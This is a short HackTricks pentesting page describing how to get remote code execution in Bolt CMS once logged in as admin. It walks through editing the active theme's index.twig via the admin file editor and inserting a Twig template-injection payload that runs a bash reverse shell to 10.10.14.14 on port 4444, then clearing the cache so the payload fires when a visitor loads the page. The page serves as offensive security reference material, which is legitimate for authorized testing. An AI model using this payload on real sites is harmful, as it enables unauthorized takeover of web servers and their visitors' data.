Bolt CMS

​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
RCE
After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:
Select Configuration -> View Configuration -> Main Configuration or go the the URL path /bolt/file-edit/config?file=/bolt/config.yaml
Check the value of theme
Select File management -> View & edit templates
Select the theme base found in the previous (base-2021 in this case) step and select index.twig
In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
Set your payload in this file via template injection (Twig), like: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
And save changes
Clear the cache in Maintenance -> Clear the cache
Access again the page as a regular user, and the payload should be executed
​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Artifactory Hacking guide
Buckets
Last modified 4mo ago